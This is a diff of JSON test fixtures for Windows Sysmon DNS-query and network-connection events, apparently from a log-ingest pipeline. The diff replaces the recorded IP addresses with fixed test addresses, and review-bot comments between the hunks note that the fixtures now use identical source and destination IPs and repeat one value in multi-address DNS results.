Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802715400Z'/\u003e\u003cEventRecordID\u003e121\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.343\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eisrg.trustid.ocsp.identrust.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 isrg.trustid.ocsp.identrust.com.edgesuite.net;type: 5 a279.dscq.akamai.net;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" @@ -2851,7 +2851,7 @@ "level": "information", "event_data": { "QueryStatus": "0", - "QueryResults": "type: 5 dart.l.doubleclick.net;::ffff:172.217.6.198;", + "QueryResults": "type: 5 dart.l.doubleclick.net;::ffff:89.160.20.156;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:03.391", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}", 
@@ -2864,7 +2864,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802729100Z'/\u003e\u003cEventRecordID\u003e122\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.391\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ead.doubleclick.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 dart.l.doubleclick.net;::ffff:172.217.6.198;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802729100Z'/\u003e\u003cEventRecordID\u003e122\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.391\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ead.doubleclick.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 dart.l.doubleclick.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" 
@@ -2924,7 +2924,7 @@ "ProcessId": "2736", "QueryName": "ocsp.sectigo.com", "QueryStatus": "0", - "QueryResults": "type: 5 t3j2g9x7.stackpathcdn.com;::ffff:151.139.128.14;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;", + "QueryResults": "type: 5 t3j2g9x7.stackpathcdn.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe" }, "level": "information", 
@@ -2946,7 +2946,7 @@ }, "event": { "provider": "Microsoft-Windows-Sysmon", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802739000Z'/\u003e\u003cEventRecordID\u003e123\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.393\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eocsp.sectigo.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 t3j2g9x7.stackpathcdn.com;::ffff:151.139.128.14;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802739000Z'/\u003e\u003cEventRecordID\u003e123\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.393\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eocsp.sectigo.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 t3j2g9x7.stackpathcdn.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event" } @@ -3022,7 +3022,7 @@ "ProcessGuid": "{42f11c3b-0bad-5c8c-0000-0010dfbc0000}", "User": "NT AUTHORITY\\NETWORK SERVICE", "SourceIsIpv6": "true", - "SourceIp": "a00:20f:0:0:18a2:6e00:e0:ffff", + "SourceIp": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6", "DestinationPortName": "domain", "DestinationIsIpv6": "true", "UtcTime": "2019-03-18 16:57:47.847", 
@@ -3031,7 +3031,7 @@ "SourcePort": "62141", "Image": "C:\\Windows\\System32\\svchost.exe", "Protocol": "udp", - "DestinationIp": "a00:203:3000:3000:3000:3000:3000:3300" + "DestinationIp": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6" }, "channel": "Microsoft-Windows-Sysmon/Operational", "opcode": "Info", 
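Review bot: `DestinationIp` is now the same address as `SourceIp` in the hunk above (`2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6`), so this event 3 fixture can no longer catch a pipeline regression that swaps the `source.*` and `destination.*` mappings, which the old distinct values could. Using two different addresses from the supported IPv6 test range, e.g. `"DestinationIp": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc7"` if that address is covered, keeps the fixture meaningful; hedge that against whatever the test GeoIP database actually contains. Moving off the old `a00:...` values is itself an improvement, since they did not look like well-formed global addresses. The enclosing event object continues past this hunk.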
@@ -3047,7 +3047,7 @@ }, "event": { "provider": "Microsoft-Windows-Sysmon", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e3\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e3\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-03-18T16:57:49.089723100Z'/\u003e\u003cEventRecordID\u003e8\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='4860' ThreadID='4492'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-03-18 16:57:47.847\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-0bad-5c8c-0000-0010dfbc0000}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e924\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Windows\\System32\\svchost.exe\u003c/Data\u003e\u003cData Name='User'\u003eNT AUTHORITY\\NETWORK SERVICE\u003c/Data\u003e\u003cData Name='Protocol'\u003eudp\u003c/Data\u003e\u003cData Name='Initiated'\u003etrue\u003c/Data\u003e\u003cData Name='SourceIsIpv6'\u003etrue\u003c/Data\u003e\u003cData Name='SourceIp'\u003ea00:20f:0:0:18a2:6e00:e0:ffff\u003c/Data\u003e\u003cData Name='SourceHostname'\u003e\u003c/Data\u003e\u003cData Name='SourcePort'\u003e62141\u003c/Data\u003e\u003cData Name='SourcePortName'\u003e\u003c/Data\u003e\u003cData Name='DestinationIsIpv6'\u003etrue\u003c/Data\u003e\u003cData Name='DestinationIp'\u003ea00:203:3000:3000:3000:3000:3000:3300\u003c/Data\u003e\u003cData Name='DestinationHostname'\u003e\u003c/Data\u003e\u003cData 
Name='DestinationPort'\u003e53\u003c/Data\u003e\u003cData Name='DestinationPortName'\u003edomain\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e3\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e3\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-03-18T16:57:49.089723100Z'/\u003e\u003cEventRecordID\u003e8\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='4860' ThreadID='4492'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-03-18 16:57:47.847\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-0bad-5c8c-0000-0010dfbc0000}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e924\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Windows\\System32\\svchost.exe\u003c/Data\u003e\u003cData Name='User'\u003eNT AUTHORITY\\NETWORK SERVICE\u003c/Data\u003e\u003cData Name='Protocol'\u003eudp\u003c/Data\u003e\u003cData Name='Initiated'\u003etrue\u003c/Data\u003e\u003cData Name='SourceIsIpv6'\u003etrue\u003c/Data\u003e\u003cData Name='SourceIp'\u003e2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6\u003c/Data\u003e\u003cData Name='SourceHostname'\u003e\u003c/Data\u003e\u003cData Name='SourcePort'\u003e62141\u003c/Data\u003e\u003cData Name='SourcePortName'\u003e\u003c/Data\u003e\u003cData Name='DestinationIsIpv6'\u003etrue\u003c/Data\u003e\u003cData 
Name='DestinationIp'\u003e2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6\u003c/Data\u003e\u003cData Name='DestinationHostname'\u003e\u003c/Data\u003e\u003cData Name='DestinationPort'\u003e53\u003c/Data\u003e\u003cData Name='DestinationPortName'\u003edomain\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "3", "kind": "event" }, 
@@ -3109,7 +3109,7 @@ "@timestamp": "2021-05-05T15:30:51.700Z", "event": { "provider": "Microsoft-Windows-Sysmon", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e3\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e3\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-03-18T16:57:49.340580700Z'/\u003e\u003cEventRecordID\u003e10\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='4860' ThreadID='4492'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-03-18 16:57:48.148\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-ccaa-5c8f-0000-0010b4e22700}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e1600\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe\u003c/Data\u003e\u003cData Name='User'\u003eVAGRANT-2012-R2\\vagrant\u003c/Data\u003e\u003cData Name='Protocol'\u003etcp\u003c/Data\u003e\u003cData Name='Initiated'\u003etrue\u003c/Data\u003e\u003cData Name='SourceIsIpv6'\u003efalse\u003c/Data\u003e\u003cData Name='SourceIp'\u003e10.0.2.15\u003c/Data\u003e\u003cData Name='SourceHostname'\u003evagrant-2012-r2.local.crowbird.com\u003c/Data\u003e\u003cData Name='SourcePort'\u003e1138\u003c/Data\u003e\u003cData Name='SourcePortName'\u003e\u003c/Data\u003e\u003cData Name='DestinationIsIpv6'\u003efalse\u003c/Data\u003e\u003cData Name='DestinationIp'\u003e40.77.226.250\u003c/Data\u003e\u003cData 
Name='DestinationHostname'\u003e\u003c/Data\u003e\u003cData Name='DestinationPort'\u003e443\u003c/Data\u003e\u003cData Name='DestinationPortName'\u003ehttps\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e3\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e3\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-03-18T16:57:49.340580700Z'/\u003e\u003cEventRecordID\u003e10\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='4860' ThreadID='4492'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-03-18 16:57:48.148\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-ccaa-5c8f-0000-0010b4e22700}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e1600\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe\u003c/Data\u003e\u003cData Name='User'\u003eVAGRANT-2012-R2\\vagrant\u003c/Data\u003e\u003cData Name='Protocol'\u003etcp\u003c/Data\u003e\u003cData Name='Initiated'\u003etrue\u003c/Data\u003e\u003cData Name='SourceIsIpv6'\u003efalse\u003c/Data\u003e\u003cData Name='SourceIp'\u003e10.0.2.15\u003c/Data\u003e\u003cData Name='SourceHostname'\u003evagrant-2012-r2.local.crowbird.com\u003c/Data\u003e\u003cData Name='SourcePort'\u003e1138\u003c/Data\u003e\u003cData Name='SourcePortName'\u003e\u003c/Data\u003e\u003cData 
Name='DestinationIsIpv6'\u003efalse\u003c/Data\u003e\u003cData Name='DestinationIp'\u003e89.160.20.156\u003c/Data\u003e\u003cData Name='DestinationHostname'\u003e\u003c/Data\u003e\u003cData Name='DestinationPort'\u003e443\u003c/Data\u003e\u003cData Name='DestinationPortName'\u003ehttps\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "3", "kind": "event" }, @@ -3137,7 +3137,7 @@ "ProcessId": "1600", "Image": "C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe", "Initiated": "true", - "DestinationIp": "40.77.226.250", + "DestinationIp": "89.160.20.156", "SourceHostname": "vagrant-2012-r2.local.crowbird.com" }, "channel": "Microsoft-Windows-Sysmon/Operational", 
@@ -3162,7 +3162,7 @@ }, "event": { "provider": "Microsoft-Windows-Sysmon", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e3\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e3\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-03-18T16:57:49.340580700Z'/\u003e\u003cEventRecordID\u003e11\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='4860' ThreadID='4492'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-03-18 16:57:48.214\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-ccaa-5c8f-0000-0010b4e22700}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e1600\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe\u003c/Data\u003e\u003cData Name='User'\u003eVAGRANT-2012-R2\\vagrant\u003c/Data\u003e\u003cData Name='Protocol'\u003etcp\u003c/Data\u003e\u003cData Name='Initiated'\u003etrue\u003c/Data\u003e\u003cData Name='SourceIsIpv6'\u003efalse\u003c/Data\u003e\u003cData Name='SourceIp'\u003e10.0.2.15\u003c/Data\u003e\u003cData Name='SourceHostname'\u003evagrant-2012-r2.local.crowbird.com\u003c/Data\u003e\u003cData Name='SourcePort'\u003e1139\u003c/Data\u003e\u003cData Name='SourcePortName'\u003e\u003c/Data\u003e\u003cData Name='DestinationIsIpv6'\u003efalse\u003c/Data\u003e\u003cData Name='DestinationIp'\u003e40.77.226.250\u003c/Data\u003e\u003cData 
Name='DestinationHostname'\u003e\u003c/Data\u003e\u003cData Name='DestinationPort'\u003e443\u003c/Data\u003e\u003cData Name='DestinationPortName'\u003ehttps\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e3\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e3\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-03-18T16:57:49.340580700Z'/\u003e\u003cEventRecordID\u003e11\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='4860' ThreadID='4492'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-03-18 16:57:48.214\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-ccaa-5c8f-0000-0010b4e22700}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e1600\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe\u003c/Data\u003e\u003cData Name='User'\u003eVAGRANT-2012-R2\\vagrant\u003c/Data\u003e\u003cData Name='Protocol'\u003etcp\u003c/Data\u003e\u003cData Name='Initiated'\u003etrue\u003c/Data\u003e\u003cData Name='SourceIsIpv6'\u003efalse\u003c/Data\u003e\u003cData Name='SourceIp'\u003e10.0.2.15\u003c/Data\u003e\u003cData Name='SourceHostname'\u003evagrant-2012-r2.local.crowbird.com\u003c/Data\u003e\u003cData Name='SourcePort'\u003e1139\u003c/Data\u003e\u003cData Name='SourcePortName'\u003e\u003c/Data\u003e\u003cData 
Name='DestinationIsIpv6'\u003efalse\u003c/Data\u003e\u003cData Name='DestinationIp'\u003e89.160.20.156\u003c/Data\u003e\u003cData Name='DestinationHostname'\u003e\u003c/Data\u003e\u003cData Name='DestinationPort'\u003e443\u003c/Data\u003e\u003cData Name='DestinationPortName'\u003ehttps\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "3", "kind": "event" }, @@ -3198,7 +3198,7 @@ "Image": "C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe", "SourceIsIpv6": "false", "SourcePort": "1139", - "DestinationIp": "40.77.226.250", + "DestinationIp": "89.160.20.156", "DestinationPort": "443", "UtcTime": "2019-03-18 16:57:48.214", "ProcessGuid": "{42f11c3b-ccaa-5c8f-0000-0010b4e22700}" @@ -3224,7 +3224,7 @@ "event_data": { "QueryName": "ocsp.int-x3.letsencrypt.org", "QueryStatus": "0", - "QueryResults": "type: 5 ocsp.int-x3.letsencrypt.org.edgesuite.net;type: 5 a771.dscq.akamai.net;::ffff:23.50.53.179;::ffff:23.50.53.177;", + "QueryResults": "type: 5 ocsp.int-x3.letsencrypt.org.edgesuite.net;type: 5 a771.dscq.akamai.net;::ffff:89.160.20.156;::ffff:89.160.20.156;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:03.468", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}", 
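Review bot: The `QueryResults` rewrite in the `@@ -3224` hunk, and likewise in the `@@ -3457` and `@@ -3476` hunks, replaces several distinct resolved addresses (`23.50.53.179` and `23.50.53.177`; four different `151.101.x.2` entries) with the same `89.160.20.156` repeated, so the fixture no longer exercises parsing of a multi-address DNS answer into distinct values. Using a different address from the supported subset for each position, e.g. `...;::ffff:89.160.20.156;::ffff:<second allowed address>;`, would preserve that case. The same single address is now also the `DestinationIp` in the `@@ -3137` and `@@ -3198` hunks, so every geo or AS enrichment in this file resolves identically, which weakens any expectation that was checking for distinct enrichment output across events.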
@@ -3241,7 +3241,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802753800Z'/\u003e\u003cEventRecordID\u003e124\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 